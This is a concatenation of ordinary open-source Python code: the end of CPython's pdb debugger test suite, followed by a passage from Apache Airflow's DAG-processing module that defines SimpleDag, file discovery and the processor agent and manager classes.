self._assert_find_function(
codecs.BOM_UTF8 + """\
def bœr():
pass
""".encode(),
'bœr',
('bœr', 1),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue36250(self):
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with support.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn("NameError: name 'invalid' is not defined",
stdout.decode())
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with support.temp_dir() as temp_dir, patch("os.path.expanduser"):
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
support.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(support.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'(Pdb) *** SyntaxError: unexpected EOF while parsing',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: unexpected EOF while parsing',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
dag_processing.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import re
import signal
import sys
import time
import zipfile
from abc import ABCMeta, abstractmethod
from collections import defaultdict
from collections import namedtuple
from importlib import import_module
import enum
from typing import Optional
import psutil
from setproctitle import setproctitle
import six
from six.moves import reload_module
from tabulate import tabulate
# To avoid circular imports
import airflow.models
from airflow import configuration as conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.settings import Stats
from airflow.models import errors
from airflow.utils import timezone
from airflow.utils.helpers import reap_process_group
from airflow.utils.db import provide_session
from airflow.utils.log.logging_mixin import LoggingMixin
if six.PY2:
ConnectionError = IOError
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
"""
def __init__(self, dag, pickle_id=None):
"""
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
self._dag_id = dag.dag_id
self._task_ids = [task.task_id for task in dag.tasks]
self._full_filepath = dag.full_filepath
self._is_paused = dag.is_paused
self._concurrency = dag.concurrency
self._pickle_id = pickle_id
self._task_special_args = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if len(special_args) > 0:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self):
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self):
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self):
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self):
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def is_paused(self):
"""
:return: whether this DAG is paused or not
:rtype: bool
"""
return self._is_paused
@property
def pickle_id(self):
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self):
return self._task_special_args
def get_task_special_arg(self, task_id, special_arg_name):
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
class SimpleTaskInstance(object):
def __init__(self, ti):
self._dag_id = ti.dag_id
self._task_id = ti.task_id
self._execution_date = ti.execution_date
self._start_date = ti.start_date
self._end_date = ti.end_date
self._try_number = ti.try_number
self._state = ti.state
self._executor_config = ti.executor_config
if hasattr(ti, 'run_as_user'):
self._run_as_user = ti.run_as_user
else:
self._run_as_user = None
if hasattr(ti, 'pool'):
self._pool = ti.pool
else:
self._pool = None
if hasattr(ti, 'priority_weight'):
self._priority_weight = ti.priority_weight
else:
self._priority_weight = None
self._queue = ti.queue
self._key = ti.key
@property
def dag_id(self):
return self._dag_id
@property
def task_id(self):
return self._task_id
@property
def execution_date(self):
return self._execution_date
@property
def start_date(self):
return self._start_date
@property
def end_date(self):
return self._end_date
@property
def try_number(self):
return self._try_number
@property
def state(self):
return self._state
@property
def pool(self):
return self._pool
@property
def priority_weight(self):
return self._priority_weight
@property
def queue(self):
return self._queue
@property
def key(self):
return self._key
@property
def executor_config(self):
return self._executor_config
@provide_session
def construct_task_instance(self, session=None, lock_for_update=False):
"""
Construct a TaskInstance from the database based on the primary key
:param session: DB session.
:param lock_for_update: if True, indicates that the database should
lock the TaskInstance (issuing a FOR UPDATE clause) until the
session is committed.
"""
TI = airflow.models.TaskInstance
qry = session.query(TI).filter(
TI.dag_id == self._dag_id,
TI.task_id == self._task_id,
TI.execution_date == self._execution_date)
if lock_for_update:
ti = qry.with_for_update().first()
else:
ti = qry.first()
return ti
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags):
"""
Constructor.
:param simple_dags: SimpleDag objects that should be in this
:type list(airflow.utils.dag_processing.SimpleDagBag)
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self):
"""
:return: IDs of all the DAGs in this
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id):
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the BaseDag
corresponding to that ID. Otherwise, throw an Exception
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
def correct_maybe_zipped(fileloc):
"""
If the path contains a folder with a .zip suffix, then
the folder is treated as a zip archive and path to zip is returned.
"""
_, archive, filename = re.search(
r'((.*\.zip){})?(.*)'.format(re.escape(os.sep)), fileloc).groups()
if archive and zipfile.is_zipfile(archive):
return archive
else:
return fileloc
COMMENT_PATTERN = re.compile(r"\s*#.*")
def list_py_file_paths(directory, safe_mode=conf.getboolean('core', 'DAG_DISCOVERY_SAFE_MODE', fallback=True),
include_examples=None):
"""
Traverse a directory and look for Python files.
:param directory: the directory to traverse
:type directory: unicode
:param safe_mode: whether to use a heuristic to determine whether a file
contains Airflow DAG definitions. If not provided, use the
core.DAG_DISCOVERY_SAFE_MODE configuration setting. If not set, default
to safe.
:return: a list of paths to Python files in the specified directory
:rtype: list[unicode]
"""
if include_examples is None:
include_examples = conf.getboolean('core', 'LOAD_EXAMPLES')
file_paths = []
if directory is None:
return []
elif os.path.isfile(directory):
return [directory]
elif os.path.isdir(directory):
patterns_by_dir = {}
for root, dirs, files in os.walk(directory, followlinks=True):
patterns = patterns_by_dir.get(root, [])
ignore_file = os.path.join(root, '.airflowignore')
if os.path.isfile(ignore_file):
with open(ignore_file, 'r') as f:
# If we have new patterns create a copy so we don't change
# the previous list (which would affect other subdirs)
lines_no_comments = [COMMENT_PATTERN.sub("", line) for line in f.read().split("\n")]
patterns += [re.compile(line) for line in lines_no_comments if line]
# If we can ignore any subdirs entirely we should - fewer paths
# to walk is better. We have to modify the ``dirs`` array in
# place for this to affect os.walk
dirs[:] = [
d
for d in dirs
if not any(p.search(os.path.join(root, d)) for p in patterns)
]
# We want patterns defined in a parent folder's .airflowignore to
# apply to subdirs too
for d in dirs:
patterns_by_dir[os.path.join(root, d)] = patterns
for f in files:
try:
file_path = os.path.join(root, f)
if not os.path.isfile(file_path):
continue
mod_name, file_ext = os.path.splitext(
os.path.split(file_path)[-1])
if file_ext != '.py' and not zipfile.is_zipfile(file_path):
continue
if any([re.findall(p, file_path) for p in patterns]):
continue
# Heuristic that guesses whether a Python file contains an
# Airflow DAG definition.
might_contain_dag = True
if safe_mode and not zipfile.is_zipfile(file_path):
with open(file_path, 'rb') as fp:
content = fp.read()
might_contain_dag = all(
[s in content for s in (b'DAG', b'airflow')])
if not might_contain_dag:
continue
file_paths.append(file_path)
except Exception:
log = LoggingMixin().log
log.exception("Error while examining %s", f)
if include_examples:
import airflow.example_dags
example_dag_folder = airflow.example_dags.__path__[0]
file_paths.extend(list_py_file_paths(example_dag_folder, safe_mode, False))
return file_paths
class AbstractDagFileProcessor(object):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
__metaclass__ = ABCMeta
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self):
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
DagParsingStat = namedtuple('DagParsingStat', ['file_paths', 'done', 'all_files_processed'])
class DagParsingSignal(enum.Enum):
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
async_mode):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Map from file path to the last runtime
self._last_runtime = {}
# Map from file path to the last finish time
self._last_finish_time = {}
# Map from file path to the number of runs
self._run_count = defaultdict(int)
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._file_paths,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_simple_dags calls _heartbeat_manager.
pass
def wait_until_finished(self):
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__CORE__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
reload_module(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
reload_module(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing result in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._file_paths = stat.file_paths
self._done = stat.done
self._all_files_processed = stat.all_files_processed
@property
def file_paths(self):
return self._file_paths
@property
def done(self):
return self._done
@property
def all_files_processed(self):
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:type _file_path_queue: list[unicode]
:type _processors: dict[unicode, AbstractDagFileProcessor]
:type _last_runtime: dict[unicode, float]
:type _last_finish_time: dict[unicode, datetime.datetime]
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode=True):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: airflow.models.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.error("Cannot use more than 1 thread when using sqlite. "
"Setting parallelism to 1")
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
# Map from file path to the processor
self._processors = {}
# Map from file path to the last runtime
self._last_runtime = {}
# Map from file path to the last finish time
self._last_finish_time = {}
self._last_zombie_query_time = timezone.utcnow()
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.utcnow()
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
# Map from file path to the number of runs
self._run_count = defaultdict(int)
# Manager heartbeat key.
self._heart_beat_key = 'heart-beat'
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
poll_time = None # type: Optional[float]
if self._async_mode:
poll_time = 0.0
self.log.debug("Starting DagFileProcessorManager in async mode")
else:
poll_time = None
self.log.debug("Starting DagFileProcessorManager in sync mode")
while True:
loop_start_time = time.time()
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Recived %s singal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
continue
self._refresh_dag_dir()
simple_dags = self.heartbeat()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None
for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
Refresh file paths from dag dir if we haven't done it for too long.
"""
elapsed_time_since_refresh = (timezone.utcnow() -
self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = timezone.utcnow()
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if ((timezone.utcnow() - self.last_stat_print_time).total_seconds() >
self.print_stats_interval):
if len(self._file_paths) > 0:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"Last Runtime",
"Last Run"]
rows = []
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
if last_runtime:
Stats.gauge(
'dag_processing.last_runtime.{}'.format(file_name),
last_runtime
)
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((timezone.utcnow() - processor_start_time).total_seconds()
if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (timezone.utcnow() - last_run).total_seconds()
Stats.gauge(
